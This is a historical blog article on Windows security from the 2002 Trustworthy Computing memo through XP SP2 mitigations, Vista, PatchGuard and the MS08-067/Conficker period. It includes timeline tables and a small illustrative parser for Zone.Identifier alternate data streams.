&lt;p&gt;The canonical paper, Lipner and Howard&apos;s &quot;The Trustworthy Computing Security Development Lifecycle,&quot; ran in the ACSAC 2004 proceedings [@s-lipner-howard-acsac2004-doi]; the IEEE Xplore PDF is paywalled in 2026, so the 2006 Microsoft Press book &lt;em&gt;The Security Development Lifecycle&lt;/em&gt; is the cite-when-possible substitute [@s-howard-lipner-sdl-book]. The SDL is what made every later Windows release feasible: each new version&apos;s threat model, security design review, fuzzing budget, and security push had a name and a sign-off list.&lt;/p&gt;

Microsoft&apos;s formal process specification for security engineering across the product lifecycle. The SDL mandates threat modeling, secure design review, security training, banned-API enforcement, fuzzing, attack-surface review, and a final security push before any product ships. Mandatory company-wide at Microsoft starting in 2004; the definitive ACSAC 2004 paper is the formal record [@s-lipner-howard-acsac2004-doi], and the 2006 Microsoft Press book is the publicly accessible canonical reference [@s-howard-lipner-sdl-book].
&lt;p&gt;The two-and-a-half years between the memo and XP Service Pack 2 were not quiet. MS03-026 in July 2003 led to Blaster three weeks later [@s-msft-ms03-026]; MS03-039 in August 2003 led to Welchia [@s-msft-ms03-039]; MS04-011 in April 2004 led to Sasser [@s-msft-ms04-011]. Each worm was, by the standards of late 2003, a public referendum on whether the &quot;patch fast&quot; model could work for an installed base of hundreds of millions of machines whose users never opened Windows Update. The pattern is worth a small table.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Why it mattered&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Jan 15, 2002&lt;/td&gt;
&lt;td&gt;Gates Trustworthy Computing memo&lt;/td&gt;
&lt;td&gt;Institutional charter for the next eight years of Windows security work&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Feb-Mar 2002&lt;/td&gt;
&lt;td&gt;Windows security stand-down&lt;/td&gt;
&lt;td&gt;About 8,500 engineers retrained on secure-coding patterns&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Jul 16, 2003&lt;/td&gt;
&lt;td&gt;MS03-026 patches DCOM RPC&lt;/td&gt;
&lt;td&gt;Patch ships about three weeks before Blaster (Aug 11)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug 11, 2003&lt;/td&gt;
&lt;td&gt;Blaster worm&lt;/td&gt;
&lt;td&gt;Patched RPC vulnerability exploited in the wild; deployment lag obvious&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aug 2003&lt;/td&gt;
&lt;td&gt;Welchia &quot;good worm&quot;&lt;/td&gt;
&lt;td&gt;Nematode-style attempt to push the patch; spreads exactly as fast as Blaster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apr 13, 2004&lt;/td&gt;
&lt;td&gt;MS04-011 patches LSASS&lt;/td&gt;
&lt;td&gt;Patch ships about two weeks before Sasser&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Apr 30, 2004&lt;/td&gt;
&lt;td&gt;Sasser worm&lt;/td&gt;
&lt;td&gt;Hits ATMs, banks, airlines; the second wormable post-patch event in a year&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dec 2004&lt;/td&gt;
&lt;td&gt;SDL formalised at ACSAC&lt;/td&gt;
&lt;td&gt;Process becomes a paper; mandatory across Microsoft engineering&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;What Microsoft was about to ship in August 2004 was not a service pack. It was a feature release with a service-pack number on it -- and it would prove that the right unit of analysis for OS-level security is not the mitigation itself but the deployment threshold the default reaches.&lt;/p&gt;
&lt;h2&gt;3. Why XP SP2 Was Treated as a Major OS Release&lt;/h2&gt;
&lt;p&gt;By the end of 2003 the SP1-era model had collapsed. The bulletin cadence was monthly; the patch was per-CVE; the deployment mechanism was opt-in; and Blaster and Sasser had both shipped while that model was running [@s-msft-secupdates-index]. None of the four design decisions individually was unreasonable. Together they had produced a Windows world in which a worm could outrun a patch by weeks, sometimes months, and the only thing standing between a Class B subnet and an exploitation rate close to 100% was whether enough users had clicked &quot;Install.&quot;&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response was a year-long slip. XP Service Pack 2, internally codenamed &quot;Springboard,&quot; moved from a planned H2 2003 release to August 6, 2004, and along the way it was upgraded from &quot;service pack&quot; to &quot;feature release with a service-pack number on it.&quot;&lt;/p&gt;
&lt;p&gt;The bundle that shipped that day did five things that no prior Windows release had ever done in a single update. The Windows Firewall arrived on by default and active during the boot sequence, closing the Blaster-window race condition. Data Execution Prevention shipped with default-on policy for Windows binaries.&lt;/p&gt;
&lt;p&gt;The Attachment Execution Service became the system-wide enforcement substrate of the &lt;code&gt;Zone.Identifier&lt;/code&gt; NTFS Alternate Data Stream. Internet Explorer 6 SP2 got a pop-up blocker on by default plus an ActiveX opt-in framework and a Local Machine Zone lockdown. Security Center became the first centralized Control Panel surface that aggregated firewall, Automatic Updates, and antivirus state into a single place a non-technical user could understand.&lt;/p&gt;
&lt;p&gt;James Forshaw&apos;s Project Zero retrospective on Windows network access is blunt about how thin the pre-SP2 firewall story was [@s-forshaw-projectzero-wfp]. The Internet Connection Firewall in XP RTM was technically present, but it was off by default, scoped to the Internet-facing interface, and the first thing most OEM imaging scripts disabled.&lt;/p&gt;

Prior to XP SP2 Windows didn&apos;t have a built-in firewall, and you would typically install a third-party firewall such as ZoneAlarm. -- James Forshaw, Google Project Zero [@s-forshaw-projectzero-wfp]
&lt;p&gt;The conceptual move underneath SP2 is the one that matters for the rest of the article. Microsoft did not invent a single new mitigation in SP2. Software firewalls, NX-style memory protection, file-provenance tagging, pop-up blockers, and centralized policy notifications all existed somewhere already in 2003 -- in third-party products, in PaX on Linux, in OpenBSD, in academic research. What SP2 did was take those mitigations off the customer&apos;s optional configuration menu and put them in the default install.&lt;/p&gt;

A security control whose default configuration on a freshly installed or upgraded system is &quot;active,&quot; not &quot;available to be enabled.&quot; On-by-default mitigations reach approximately the entire installed base of a release; opt-in mitigations reach approximately the small fraction of users who actively configure them. The asymmetry is roughly two orders of magnitude in deployment reach, which is the engineering reason XP SP2 was treated as a re-release rather than as a service pack [@s-forshaw-projectzero-wfp].
&lt;p&gt;The &quot;5%/95%&quot; framing is shorthand for the on-by-default-vs-opt-in asymmetry -- a two-orders-of-magnitude reach gap [@s-forshaw-projectzero-wfp] that motivated default-on Firewall, default-on DEP for system binaries, default-on Automatic Updates, and default-on UAC.&lt;/p&gt;
&lt;p&gt;Here is the SP2 bundle as a table. The third column is the load-bearing one: every default-on choice in SP2 came with a real compatibility cost, and the article&apos;s later sections are partly the story of those costs being paid down.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;SP2 mitigation&lt;/th&gt;
&lt;th&gt;Attack class broken&lt;/th&gt;
&lt;th&gt;Compatibility cost&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Windows Firewall on by default&lt;/td&gt;
&lt;td&gt;Worm-style unauthenticated TCP/445, TCP/135 RPC&lt;/td&gt;
&lt;td&gt;Apps binding listening ports without firewall exception manifest&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Execution Prevention&lt;/td&gt;
&lt;td&gt;Stack and heap shellcode execution&lt;/td&gt;
&lt;td&gt;First-generation JITs that wrote executable code into RW pages&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AES + Zone.Identifier ADS&lt;/td&gt;
&lt;td&gt;Outlook and IE auto-launch of attachments&lt;/td&gt;
&lt;td&gt;Legitimate self-extracting installers from network shares&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IE6 SP2 hardening&lt;/td&gt;
&lt;td&gt;Drive-by ActiveX install, pop-up ad layers, MIME confusion&lt;/td&gt;
&lt;td&gt;Line-of-business intranet ActiveX apps; legacy webmail pop-ups&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security Center&lt;/td&gt;
&lt;td&gt;Status invisibility for non-technical users&lt;/td&gt;
&lt;td&gt;Third-party AV vendors objected to display of competing status&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Once the 5%/95% threshold becomes the unit of analysis, the question changes. The question is no longer &quot;what is the best mitigation we could ship?&quot; It is &quot;what mitigation will the user not turn off?&quot; Every Vista feature in the next chapter is an answer to that question -- and every Vista feature that broke compatibility is the price the answer cost.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;XP SP2 reached the broad public via Automatic Updates by late August 2004. By the end of the year Microsoft had pushed the largest single security update in the operating system&apos;s history onto roughly the entire XP installed base. The five mitigations that landed that day deserve their own catalogue.&lt;/p&gt;
&lt;h2&gt;4. The XP SP2 Mitigation Catalogue&lt;/h2&gt;
&lt;p&gt;XP SP2 shipped on August 6, 2004 and reached the broad public via Automatic Updates by late August. The five mitigations below are not equally famous, but they are equally load-bearing for what came next in Vista. Each subsection opens with what the mitigation broke (the attack class) and ends with what it broke (the compatibility cost).&lt;/p&gt;
&lt;h3&gt;4.1 Windows Firewall on by default&lt;/h3&gt;
&lt;p&gt;Pre-SP2, XP had something called the Internet Connection Firewall. It was off by default; it bound only to the interface flagged as the Internet connection during setup; and any application that wanted a listening port could simply listen on a different interface and never trigger it. The Blaster window -- the moment between a fresh XP installing on a network and Automatic Updates pulling MS03-026 -- was open for as long as DHCP plus the first reboot took, which on a 2003-era cable modem was about ninety seconds. Welchia exploited the same window in reverse.&lt;/p&gt;
&lt;p&gt;The fix in SP2 was structural. The renamed Windows Firewall came on by default on every interface, was active during the boot sequence (before user-mode services finished initialising), and ran during a brief boot-time stateful inspection window before the regular policy engine took over [@s-forshaw-projectzero-wfp].&lt;/p&gt;
&lt;p&gt;What this broke for compatibility: every legitimate application that bound a listening port without registering a firewall exception manifest. Domain join, the older SMB RPC paths, and a long list of corporate management tools needed exception entries pushed via Group Policy before they would work on freshly joined SP2 machines. The forward link is to Vista&apos;s Windows Filtering Platform in section 6.6, which gave third-party firewalls and IDS/IPS vendors a supported extension surface instead of forcing them to keep hooking NDIS.&lt;/p&gt;
&lt;h3&gt;4.2 Data Execution Prevention&lt;/h3&gt;
&lt;p&gt;Data Execution Prevention is the Windows trade name for refusing to execute instructions from pages marked as data. Hardware-enforced DEP uses the AMD NX bit (&quot;No-eXecute&quot;) or the Intel XD bit (&quot;eXecute Disable&quot;), both shipped in commodity x86 silicon by 2004 -- the AMD64 Athlon 64 launched with the NX bit on September 23, 2003 [@s-wp-athlon-64], and Intel followed with XD on the Prescott Pentium 4 stepping in mid-2004.&lt;/p&gt;
&lt;p&gt;Software-enforced DEP on CPUs without the bit relied on SafeSEH-based exception-handler validation, which closed the most common shellcode-staging pattern of the era (overwrite a saved exception handler on the stack, trigger an exception, jump into shellcode) without actually marking pages non-executable [@s-msft-sehop-kb956607]. SP2 introduced four configurations -- &lt;code&gt;OptIn&lt;/code&gt;, &lt;code&gt;OptOut&lt;/code&gt;, &lt;code&gt;AlwaysOn&lt;/code&gt;, &lt;code&gt;AlwaysOff&lt;/code&gt; -- selectable via &lt;code&gt;boot.ini&lt;/code&gt; and later via BCD; the default on consumer XP was &lt;code&gt;OptIn&lt;/code&gt; (system DLLs only) [@s-windows-internals-5e].&lt;/p&gt;

A defense that refuses to fetch and execute instructions from memory pages whose protection bits mark them as non-executable. Hardware-enforced DEP uses the NX page-table bit on x86 / x64 silicon (AMD&apos;s branding) or the XD bit (Intel&apos;s branding). Software-enforced DEP without the page bit relies on safe exception handlers (SafeSEH) to close the dominant stack-overflow exploitation pattern [@s-msft-sehop-kb956607]. Shipped in XP SP2 in August 2004 and refined repeatedly through Windows 10 [@s-windows-internals-5e].

A single bit in an x86 / x64 page table entry that, when set, instructs the CPU to fault on an instruction fetch from that page. AMD&apos;s name is NX (No-eXecute) and shipped first in 2003 on the Opteron; Intel&apos;s equivalent is XD (eXecute Disable). The bit is the hardware substrate for DEP and for the W^X (Write XOR Execute) memory policy that OpenBSD and PaX had pioneered earlier in the decade [@s-pax-aslr-live, @s-openbsd-3-4-wayback].
&lt;p&gt;The academic prior art is older than DEP by six years. Crispin Cowan&apos;s StackGuard paper at the 7th USENIX Security Symposium in January 1998 [@s-cowan-stackguard] introduced the canary-based stack-overflow detector that the Visual C++ &lt;code&gt;/GS&lt;/code&gt; flag adopted in 2002 with Visual Studio .NET [@s-msft-gs-buffer-security-check, @s-wp-vs] and that DEP complemented rather than replaced. On the Linux side, the PaX project had shipped W^X plus mmap-base randomization in 2003 [@s-pax-aslr-live, @s-pax-docs-index]. OpenBSD 3.4, released on November 1, 2003, was the first general-purpose operating system to ship integrated W^X plus library-load-order randomization default-on [@s-openbsd-3-4-wayback]. Vista&apos;s ASLR three years later was, by mainstream-OS standards, late.&lt;/p&gt;
&lt;p&gt;The DEP-versus-JIT compatibility breakage is the canonical &quot;good security default that breaks shipping software&quot; story of the SP2 era. JavaScript engines, Java, .NET, and Flash all generated executable code into RW pages at runtime and ran headlong into DEP&apos;s first-generation policy. The modern fix is the explicit &lt;code&gt;VirtualProtect&lt;/code&gt; transition (RW into RX and back) that every JIT now uses, but the engineering took years to converge across vendors. The next pass through the same problem -- W^X enforced by CPU mode in Apple silicon -- finally made the explicit-transition pattern a first-class API.&lt;/p&gt;
&lt;h3&gt;4.3 Attachment Execution Service and the Zone.Identifier ADS&lt;/h3&gt;
&lt;p&gt;This is the subsection that most retellings of XP SP2 get backwards. The &lt;a href=&quot;https://paragmali.com/blog/mark-of-the-web-smartscreen-catalog-of-trust/&quot; rel=&quot;noopener&quot;&gt;Mark-of-the-Web&lt;/a&gt; -- the HTML comment of the form &lt;code&gt;&amp;lt;!-- saved from url=... --&amp;gt;&lt;/code&gt; that Internet Explorer reads on a saved web page to decide which security zone to apply -- did not ship with SP2. It shipped two years earlier in Internet Explorer 6 Service Pack 1 in 2002.&lt;/p&gt;
&lt;p&gt;What SP2 added is the Attachment Execution Service: the system-wide enforcement substrate that, when a file arrives via Outlook, Outlook Express, Internet Explorer, Windows Messenger, or any caller of the &lt;code&gt;IAttachmentExecute&lt;/code&gt; shell API [@s-msft-iattachmentexecute], writes a &lt;code&gt;Zone.Identifier&lt;/code&gt; NTFS Alternate Data Stream tagging the file with its originating security zone.&lt;/p&gt;

The XP SP2 shell service that, on attachment download from a recognised zone-aware caller (Outlook, IE, Messenger, the `IAttachmentExecute` API [@s-msft-iattachmentexecute]), writes a `Zone.Identifier` NTFS Alternate Data Stream tagging the file with its originating zone (Internet, Restricted, Trusted, Local Intranet). AES is the system-wide enforcement substrate that materialised the existing Mark-of-the-Web concept into a persistent file-system record the Shell consults at execute time. Substrate, not ancestor.

An NTFS Alternate Data Stream named `Zone.Identifier`, attached to a file by the Attachment Execution Service or its callers. The ADS body is a small INI file with a `[ZoneTransfer]` section whose `ZoneId` value (3 for Internet, 4 for Restricted, 2 for Trusted, 1 for Local Intranet, 0 for Local Machine) the Shell reads on execute attempts. The ADS persists with the file across copies on NTFS volumes; copying to FAT32 or onto a non-NTFS share strips it -- which is why USB sticks and consumer file-sharing services have historically been laundering paths for web-originated executables.
&lt;p&gt;{&lt;code&gt; // Illustrative parser. The real call is to CreateFileW on a path of // the form &quot;C:\\\\downloads\\\\foo.exe:Zone.Identifier&quot;, reading the // resulting stream as a tiny INI file. const adsContent = [   &quot;[ZoneTransfer]&quot;,   &quot;ZoneId=3&quot;,   &quot;ReferrerUrl=example.com/&quot;,   &quot;HostUrl=example.com/downloads/foo.exe&quot;, ].join(&quot;\\n&quot;); const zoneNames = { 0: &quot;Local Machine&quot;, 1: &quot;Local Intranet&quot;,                     2: &quot;Trusted&quot;, 3: &quot;Internet&quot;, 4: &quot;Restricted&quot; }; const lines = adsContent.split(&quot;\\n&quot;); const kv = Object.fromEntries(   lines.filter(l =&amp;gt; l.includes(&quot;=&quot;)).map(l =&amp;gt; l.split(&quot;=&quot;))); const zone = parseInt(kv.ZoneId, 10); console.log(\&lt;/code&gt;File originated from zone ${zone} (${zoneNames[zone]})`);
console.log(`Referrer: ${kv.ReferrerUrl}`);
`}&lt;/p&gt;
&lt;p&gt;The architectural property the substrate produces is the one downstream tools cannot live without. Office Protected View opens with restricted privileges precisely when the document&apos;s Zone.Identifier reports Internet origin. SmartScreen warns on first execute of any binary whose ADS says Internet. Microsoft Defender Application Control treats Zone.Identifier as a first-class file attribute in its policy language. None of those tools would work the way they do if AES had not made the zone tag a persistent file-system property in 2004.&lt;/p&gt;
&lt;h3&gt;4.4 Internet Explorer 6 SP2 hardening&lt;/h3&gt;
&lt;p&gt;The IE6 SP2 hardening pass is the largest browser security delta in any service-pack-era Windows update before or since. The pop-up blocker on by default plus the Information Bar gave the browser a way to defer execution of script-launched popups behind an explicit user click. MIME-handling lockdown closed the MIME-sniffing attacks the Outlook MHTML class had enabled (an attacker could serve a binary as &lt;code&gt;Content-Type: text/plain&lt;/code&gt; and have IE sniff and execute it anyway).&lt;/p&gt;
&lt;p&gt;The Local Machine Zone lockdown blocked script execution from the LMZ by default for IE-rendered documents, closing the cross-zone elevation path that several earlier IE vulnerabilities had taught attackers to chain through &lt;code&gt;mhtml:&lt;/code&gt; and &lt;code&gt;file://&lt;/code&gt; URL tricks. The ActiveX opt-in framework required user confirmation before any controls were installed from the Internet. The compatibility cost was real and immediate: legitimate ActiveX line-of-business intranet apps, legacy webmail pop-ups, and corporate intranet portals all required exemption configuration before they would keep working as before.&lt;/p&gt;
&lt;h3&gt;4.5 Security Center&lt;/h3&gt;
&lt;p&gt;Security Center is easy to underestimate because its UI looked like a Control Panel applet. It was the first centralised surface that aggregated three previously invisible state signals -- firewall status, Automatic Updates status, antivirus status (presence, definitions currency, real-time protection enabled) -- into a single interface a non-technical user could read.&lt;/p&gt;
&lt;p&gt;The balloon-tip notification UI surfaced negative states aggressively; the visible degradation was the entire point. The third-party AV vendors -- Symantec and McAfee in particular -- objected publicly to Microsoft&apos;s display of competing status, and the resulting friction previewed the 2009 European Union agreement that constrained Microsoft&apos;s default-bundled-AV options for the rest of the era.&lt;/p&gt;
&lt;p&gt;Three of these five mitigations made it into Vista substantially unchanged. Two of them -- the firewall and the ADS-based zone tagging -- were re-architected because Vista&apos;s threat model went past the application-on-the-network and into the application-on-the-desktop. To see why, we have to leave XP behind and walk year by year through what happened next.&lt;/p&gt;
&lt;h2&gt;5. Year by Year, 2005 Through 2009&lt;/h2&gt;
&lt;p&gt;If XP SP2 was the proof of concept for on-by-default mitigations, the next four years were the proof of work. Microsoft was shipping kernel self-protection, anti-exploit defenses, and the first real attempt at a privilege model the consumer would actually use. The security research community was learning faster than the shipping cadence could absorb. Two industry coordination moments and one wormable RCE close the period.&lt;/p&gt;

gantt
    dateFormat YYYY-MM-DD
    axisFormat %b %Y
    section Memos and process
    Trustworthy Computing memo :a1, 2002-01-15, 7d
    Security stand-down :a2, 2002-02-01, 60d
    SDL mandated at Microsoft :a3, 2004-09-01, 120d
    Mojave Experiment :a4, 2008-07-01, 30d
    section Windows releases
    XP SP2 :b1, 2004-08-06, 90d
    XP x64 and Server 2003 x64 :b2, 2005-04-25, 30d
    Vista RTM :b3, 2006-11-08, 14d
    Vista consumer GA :b4, 2007-01-30, 14d
    Vista SP1 RTM :b5, 2008-02-04, 14d
    Vista SP1 GA :b6, 2008-03-18, 14d
    Windows 7 RTM :b7, 2009-07-22, 14d
    Windows 7 GA :b8, 2009-10-22, 14d
    section Attacks
    Blaster :c1, 2003-08-11, 30d
    Welchia :c2, 2003-08-18, 30d
    Sasser :c3, 2004-04-30, 30d
    MS08-067 out-of-band patch :c4, 2008-10-23, 7d
    Conficker.A first detected :c5, 2008-11-20, 30d
    Conficker.C DGA expansion :c6, 2009-03-04, 30d
    section Research
    Cowan StackGuard USENIX :d1, 1998-01-26, 7d
    PaX ASLR design doc :d2, 2003-03-15, 7d
    OpenBSD 3.4 W^X plus library randomization :d3, 2003-11-01, 7d
    Shacham et al CCS 2004 ASLR analysis :d4, 2004-10-25, 7d
    Hoglund and Butler Rootkits book :d5, 2005-06-01, 7d
    skape and Skywing Uninformed Vol 3 :d6, 2005-12-01, 7d
    Symantec McAfee public PatchGuard objection :d7, 2006-10-01, 30d
    Ferguson BitLocker whitepaper :d8, 2006-08-01, 30d
    Shacham ROP CCS 2007 :d9, 2007-10-29, 7d
    Halderman cold-boot USENIX 2008 :d10, 2008-07-28, 7d
    Conficker Working Group forms :d11, 2009-02-12, 14d
    CWG Lessons Learned final :d12, 2010-06-17, 7d
&lt;h3&gt;5.1 April 2005: XP Professional x64 Edition and Server 2003 x64&lt;/h3&gt;
&lt;p&gt;Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition were the first Windows releases to ship &lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;Kernel Patch Protection&lt;/a&gt; -- the kernel self-defense mechanism widely known as PatchGuard. The common version of the story moves PatchGuard&apos;s debut to Vista by twenty months. It did not debut on Vista.&lt;/p&gt;
&lt;p&gt;Microsoft Security Advisory 932596 (published August 14, 2007, updated April 23, 2008) is unambiguous: &quot;An update is available for Kernel Patch Protection included with x64-based Windows operating systems&quot; [@s-msft-adv-932596]. The x64-based qualifier is load-bearing. Vista x64 inherited PatchGuard v2 in November 2006; Vista SP1 x64 shipped v3 in February 2008. The x86 editions of Vista never got PatchGuard.&lt;/p&gt;

Microsoft&apos;s kernel-mode self-protection feature on x64 Windows. PatchGuard periodically verifies the integrity of a fixed list of kernel data structures (SSDT, IDT, GDT, MSRs, system images, the kernel&apos;s own code pages) and bug-checks the system on detected modification. Shipped first in April 2005 in Windows XP Professional x64 Edition and Windows Server 2003 x64 Edition. Vista x64 inherited it (v2 in Vista RTM, v3 in Vista SP1). Vista did NOT introduce PatchGuard [@s-msft-adv-932596].
&lt;p&gt;The architectural target of PatchGuard is the 2003-era rootkit class catalogued in Hoglund and Butler&apos;s &lt;em&gt;Rootkits: Subverting the Windows Kernel&lt;/em&gt; (Addison-Wesley, 2005) [@s-hoglund-butler-rootkits]: SSDT hooks, IDT hooks, inline patches of function prologues, modifications to the System Service Descriptor Table, manipulation of the Object Manager&apos;s namespace. The same April 2005 release also introduced advisory (warnings, not enforcement) kernel-mode driver signing. Mandatory kernel-mode driver signing arrived with Vista x64 a year and a half later [@s-msft-driver-signing].&lt;/p&gt;
&lt;h3&gt;5.2 October 2006: Symantec and McAfee object to PatchGuard in public&lt;/h3&gt;
&lt;p&gt;The first major public clash between kernel self-defense and the kernel-extension model that the antivirus industry had built businesses on came in October 2006, weeks before Vista RTM. Symantec and McAfee both took the position that PatchGuard would make their products materially less effective by closing off the kernel-mode hooking patterns their behavioural detection engines depended on [@s-wp-kpp].&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s response was to formalise the existing &lt;code&gt;Cm&lt;/code&gt;, &lt;code&gt;Ob&lt;/code&gt;, and &lt;code&gt;Ps&lt;/code&gt; notification routines (registry, object-manager, and process callbacks) and the Filter Manager and Windows Filtering Platform callout architectures as supported extension surfaces. The pattern -- a kernel-integrity feature pressed up against existing AV business models, followed by a published callback API that gives the AV industry a supported path -- recurs with Driver Signature Enforcement in Vista x64, with Early Launch Antimalware in Windows 8, with HVCI in Windows 10 and 11, and with the Microsoft Vulnerable Driver Block list rollout from 2020 onward.&lt;/p&gt;
&lt;h3&gt;5.3 December 1, 2005: skape and Skywing&apos;s &quot;Bypassing PatchGuard on Windows x64&quot;&lt;/h3&gt;
&lt;p&gt;In December 2005, eight months after PatchGuard&apos;s debut, skape (Matt Miller) and Skywing (Ken Johnson) published &quot;Bypassing PatchGuard on Windows x64&quot; in &lt;em&gt;Uninformed&lt;/em&gt; Vol. 3 [@s-skape-skywing-patchguard]. The paper is widely mis-cited: it is dated December 1, 2005 (the &lt;em&gt;Uninformed&lt;/em&gt; volume publication is January 2006); it is co-authored, not single-authored; it has no subtitle. Upstream secondary references occasionally attribute the paper to Skywing alone with a July 2006 date and the subtitle &quot;Bypassing Kernel Patch Protection on Windows x64.&quot; The corrected metadata is what the article uses.&lt;/p&gt;

The structural observation that any defense which runs at a given privilege level cannot fundamentally constrain an attacker who also runs at that privilege level. PatchGuard runs at ring 0; rootkits run at ring 0; therefore PatchGuard is bypassable in principle from a sufficiently privileged kernel-mode attacker. skape and Skywing&apos;s December 2005 *Uninformed* paper demonstrated three concrete bypass technique classes [@s-skape-skywing-patchguard]. The genuine architectural fix waits for hypervisor-protected mechanisms (HVCI in Windows 10 Anniversary Update, August 2016; VBS and Pluton in Windows 11) that run the integrity verifier from a more privileged execution mode than the attacker.

Any defense that runs at the same privilege level as the attacker is fundamentally bypassable. -- paraphrased from the load-bearing conclusion of skape and Skywing, *Uninformed* Vol. 3, December 1, 2005 [@s-skape-skywing-patchguard]
&lt;h3&gt;5.4 November 8, 2006: Vista RTM&lt;/h3&gt;
&lt;p&gt;Windows Vista released to manufacturing on November 8, 2006. Volume-license availability via the Microsoft Volume Licensing portal began &quot;sometime before Nov. 30, 2006&quot; per the same-day Computerworld press-conference coverage [@s-lai-computerworld-vista-rtm]. Consumer general availability was January 30, 2007. Keep these as three distinct dates: the gap between RTM and consumer GA is where most enterprise IT departments tested compatibility, and where the volume-license customers who later complained loudest about Vista actually first encountered it.&lt;/p&gt;
&lt;h3&gt;5.5 January 30, 2007: Vista consumer GA and the reception&lt;/h3&gt;
&lt;p&gt;The pivot from technical release to cultural event happened in the first six months of 2007. Apple&apos;s &quot;Get a Mac&quot; television-spot series ran &quot;Security&quot; and &quot;Cancel or Allow&quot; through the summer, dramatizing UAC prompt fatigue for a mass audience [@s-wp-get-a-mac].&lt;/p&gt;
&lt;p&gt;The &lt;em&gt;Kelley v. Microsoft Corp.&lt;/em&gt; lawsuit (No. 2:07-cv-00475-MJP, W.D. Wash.) was filed on March 29, 2007 and certified as a class action in February 2008 [@s-cw-vista-capable-class], alleging that Microsoft had marketed machines as &quot;Vista Capable&quot; that could only run Home Basic without the Aero compositor or many of the security features the launch had highlighted. The Mojave Experiment in July 2008 -- Microsoft showing Vista to focus groups under a different name and getting positive reactions -- was the era&apos;s confession that the perceptual layer mattered as much as the architectural layer [@s-msft-mojave-experiment, @s-wp-mojave-experiment].&lt;/p&gt;
&lt;p&gt;The Vista Capable case is &lt;em&gt;Kelley v. Microsoft Corp.&lt;/em&gt;, No. 2:07-cv-00475-MJP, W.D. Wash., filed March 29, 2007 and certified February 22, 2008 [@s-cw-vista-capable-class]. Coverage that condenses the timeline to &quot;Vista launched and was sued&quot; tends to misstate the filing month as April or May.&lt;/p&gt;
&lt;p&gt;Was Vista the most-hated Windows release? Windows ME and Windows 8 have competing claims, and any honest treatment needs to acknowledge them. Call Vista one of the most poorly received Windows consumer releases of its era. The reception was uniquely consequential -- the SP1-era enterprise inertia, the consumer skipping that left a large XP-to-7 leap, and the marketing problem Windows 7&apos;s launch had to solve. The substantive argument does not depend on the superlative.&lt;/p&gt;
&lt;h3&gt;5.6 February 4, 2008: Vista SP1 RTM&lt;/h3&gt;
&lt;p&gt;Vista Service Pack 1 released to manufacturing on February 4, 2008, with broad availability starting March 18, 2008 [@s-msft-news-vista-sp1-rtm]. This is the &quot;real Vista&quot; enterprise IT deployed. PatchGuard v3 shipped with SP1. The file-copy engine got the performance fix that Vista&apos;s reviewers had spent a year complaining about. Windows Search was refactored to reduce IO contention with foreground work. A set of compatibility shims relaxed UAC on several common operations that had been hitting too many false-positive prompts.&lt;/p&gt;
&lt;p&gt;Vista SP1 RTM is February 4, 2008 (build 6001.18000); broad GA is March 18, 2008 [@s-msft-news-vista-sp1-rtm]. Upstream summaries sometimes mis-state the RTM as November 2007 -- that date is actually the SP1 Release Candidate 1 milestone, not RTM.&lt;/p&gt;
&lt;h3&gt;5.7 October 23, 2008: MS08-067 out-of-band&lt;/h3&gt;
&lt;p&gt;The vulnerability behind MS08-067 is a stack buffer overflow in the path-handling code (the function commonly named &lt;code&gt;NetprPathCanonicalize&lt;/code&gt; in the NetAPI library), reachable through the Server service&apos;s &lt;code&gt;srvsvc&lt;/code&gt; RPC interface over SMB on TCP/445 (and TCP/139 in NetBT environments) without authentication. CVE-2008-4250 [@s-nvd-cve-2008-4250]. The patch is out-of-band because the MSRC analysts who reviewed the bug believed weaponisation was weeks away.&lt;/p&gt;
&lt;p&gt;Vista&apos;s DEP and ASLR materially raised the cost of exploitation on Vista compared to XP -- the bulletin rates the issue Critical on Windows 2000, XP, and Server 2003 but Important on Vista and Server 2008 [@s-ms08-067]. The October 2008 installed base, however, was overwhelmingly Server 2003 and XP. The first in-the-wild MS08-067 exploitation in October 2008 was Gimmiv.A, a narrower non-self-propagating Trojan, per NVD [@s-nvd-cve-2008-4250]. Conficker was three weeks away.&lt;/p&gt;
&lt;h3&gt;5.8 Late November 2008: Conficker.A is first detected&lt;/h3&gt;
&lt;p&gt;Conficker.A was first detected in late November 2008, anchored to November 20, 2008 in SRI International&apos;s &quot;An Analysis of Conficker C&quot; addendum, whose introductory paragraph reads: &quot;Conficker malware family, which first appeared on the Internet on 20 November 2008&quot; [@s-sri-conficker-c-addendum]. The gap from MS08-067 to Conficker.A is approximately twenty-nine days. The October-2008 in-the-wild MS08-067 exploitation was Gimmiv.A; Conficker is a separate, later, much larger event.&lt;/p&gt;
